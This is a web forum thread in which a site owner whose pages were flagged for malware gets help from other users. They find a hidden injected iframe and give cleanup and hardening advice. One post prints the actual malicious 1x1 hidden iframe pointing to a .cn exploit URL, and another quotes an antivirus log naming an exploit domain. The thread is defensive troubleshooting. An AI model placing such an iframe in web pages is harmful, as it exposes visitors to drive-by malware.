Please check my web site for virus!

My computer has just recovered from a trojan attack that was installed through a SWF component masquerading as a routine software update.

Now I've removed the virus from the computer but when I access http://www.microchipcatflaps.co.uk/ (one of my web sites) in Google Chrome I get an error message saying it has detected Malware and refuses to go to the site.

It is saying there is a link to hyperliteautoservices.cn somewhere in the page but when I check the source code I cannot find anything.

Please can you check to see if there is anything on the page that is linking or redirecting to hyperliteautoservices.cn?

Thank you,

James.

 

It loads up fine in my chrome browser however I can see in you code source that it has been hacked and you have a hidden iframe which is linked to another site which is then linked to hyperliteautoservices.cn. You need to get this sorted as people do purchase itmes through your site and their details may get hacked and you could get in trouble.

You could actually think about a re-design of you site as it is crammed full of text and content and looks a bit outdated.
If you want any more help, please don't hesitate to ask.

 

Where is the iframe in the source code? I've checked and cannot find any such code.

The site is certainly not outdated. We get complimented on the web site every day.

Also I've reinstalled the Google Chrome browser and the message has stopped appearing so I think the problem was with the browser being modified rather than the web site.

Can anyone else check please to be sure?

 

I'm seeing the iframe, so it's not (just) a browser problem. The iframe is on line 5 of your source, right after the opening body tag. Presumably they got access to your site files somehow. I'd change all passwords, and make sure your local computer is totally clean. Perhaps even a wipe and reinstall - if they had access it's hard to know what all they may have done to your system.

 

Detected by NOD32:

15/04/2009 04:19:09 p.m.	HTTP filter	file	http://liteautogreatest.cn/index.php	JS/Exploit.Agent.AFH trojan	connection terminated - quarantined	Threat was detected upon access to web by the application: C:\Archivos de programa\Mozilla Firefox\firefox.exe.

Code (markup):

delete this from your source, its right after the body tag as awatson said

<iframe src="http://lotultimatebet.cn/in.cgi?income60" width=1 height=1 style="visibility: hidden"></iframe>

Code (markup):

 

You should temporarily take down your site and fix the problem before putting it back up again, you don't want your visitors getting viruses or your site will get a pretty bad impression.

It would also help if you put a space between the http:// and the rest of your site so the link is not active, so other members of this forum don't get a virus as well.

Best of luck with your problem,
onehundredandtwo.

EDIT: Afterwards I would make sure any PHP or ASP(X) scripts are up-to-date so that you can't be hacked again.

 

also make sure to inform your hosting company about hacker attacks as this could be a case for several people.

 

Thanks for your help please can you check it is removed now?

 

The site seems to still be up and going. Try removing it again.

 

i have checked your website. The site still seems to be going. Can you remove it again so that i can check your site again?

 

Can't see the iframe any more, seems to be fine now.
Would change all passwords and everything like that regularly for extra security.

I noticed your forum is not up and it links though to your facebook instead. If you do go back to using a forum like PhpBB, that you were using, make sure you keep up to date with updates and patches etc.

Hope the business goes well.

 

Thank you very much for all your help. I'm pleased we got this fixed ASAP.

 

Nope you may still have malware on other pages just goto google webmaster central and add/verify your site than you will see message about how many pages are infected so just fix those page and click on something like submit for review like that! Google will verify your site again and will take your site out from black list if it appears to be clean

 

Will check that too c4. Thanks for the tip!

 

Happened to me a few times. (I run 60 plus sites) so we created the site in my signature. We will help you isolate the problem, and make it so you will be notified via email if there is a hack. Being hacked is the worst. There are some very clever hacks, such as using ASCII code to redirect. ugggghhh.

 

My pleasure!

 

This just happened to my site yesterday, any help will be appreciated. www mdtcs.com, google displays that this site could be harmfull to your computer.

 

follow these guidelines and everything would be okay! If you want than i can help you for a little fee!

Thanks

 

Scan your computer, contact your hosting provider for possible server compromise and change your passwords.

 

Hackers get in to your sire via your FTP software profile. Hence , Do not save your site password in your FTP software like cuteftp,flashfxp, etc... Always type FTP password manually on each connect.

Hope this message , helps all....